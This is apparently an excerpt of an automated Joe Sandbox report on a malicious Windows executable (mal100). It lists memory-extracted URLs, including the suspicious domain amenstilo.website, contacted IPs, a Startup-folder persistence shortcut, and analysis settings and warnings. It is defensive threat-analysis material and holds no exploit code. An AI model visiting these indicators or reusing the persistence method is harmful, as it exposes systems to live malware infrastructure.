http://home.netscape.com/NC-rdf#DirTreeNameSort	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitle	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Subscribablehttp://home.netscape.com/NC-rdf#Subscribedhttp://home.ne	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/	Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanRename	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#fileExtensions	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanSearchMessages	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#LeafName	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleMain	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanCreateFoldersOnServer	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Identity	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#prettyNamehttp://home.netscape.com/NC-rdf#alwaysAskhttp://home.netsc	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Rename	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Virtual	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DirUri	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanFileMessagesOnServer	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Subscribable	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Transferred	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#SupportsOffline	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsSessionDefaultServer	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2Fsj	Qjsync.exe, 00000011.00000003.3019877415.0000000000603000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Modify.descriptionldap_2.servers.pab.descriptionabook.mab%s%s.mabcon	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTag	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Delete	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://wpad/wpad.datnetwork.proxy.autoconfig_urlnetwork.proxy.no_proxies_onnetwork.proxy.failover_ti	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#BookmarkSeparator	thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsRemote	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#MoveFolder	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DateStarted	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#prettyName	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.netscape.com/newsref/std/cookie_spec.html	thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.???.xx/?search=%s	thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#KeyIndex	thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/To	Qjsync.exe, 00000011.00000002.3020333997.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019604424.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#saveToDisk	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#RedirectorType	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#FolderTreeName?sort=true	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#ProgressPercent	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Settingsmsgaccounts:/http://home.netscape.com/NC-rdf#PageTitleFakeAc	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#File	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsDirectory	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#child	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.surfok.de/	Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#FileSystemObject	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/4o	Qjsync.exe, 00000011.00000002.3020333997.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#useSystemDefault	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Key	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Copy	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleServer	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#TotalMessages	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.com/?Freeware/Find.Same.Images.OK	cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#CharsetDetector	thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#extension	thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false
52.222.214.90	download.binance.com	United States		16509	AMAZON-02US	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569043
Start date and time:	2024-12-05 11:39:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MiJZ3z4t5K.exe renamed because original name is a hash value
Original Sample Name:	0a5d8601aff94ec2960ba5487d120e4f2952bf8b8cf9cd36873bf941721d67c4.exe
Detection:	MAL
Classification:	mal100.expl.evad.winEXE@27/52@2/3
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 99% Number of executed functions: 209 Number of non-executed functions: 251
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MiJZ3z4t5K.exe, PID 4824 because it is empty
Execution Graph export aborted for target thunderbird.exe, PID 5780 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: MiJZ3z4t5K.exe

Simulations

Behavior and APIs

Time	Type	Description
05:39:52	API Interceptor	15x Sleep call for process: powershell.exe modified
05:40:15	API Interceptor	448567x Sleep call for process: MiJZ3z4t5K.exe modified
05:40:16	API Interceptor	1x Sleep call for process: AppsLo.exe modified
05:40:50	API Interceptor	2x Sleep call for process: svchost.exe modified
05:41:16	API Interceptor	20x Sleep call for process: Qjsync.exe modified
11:40:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kcvalid.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
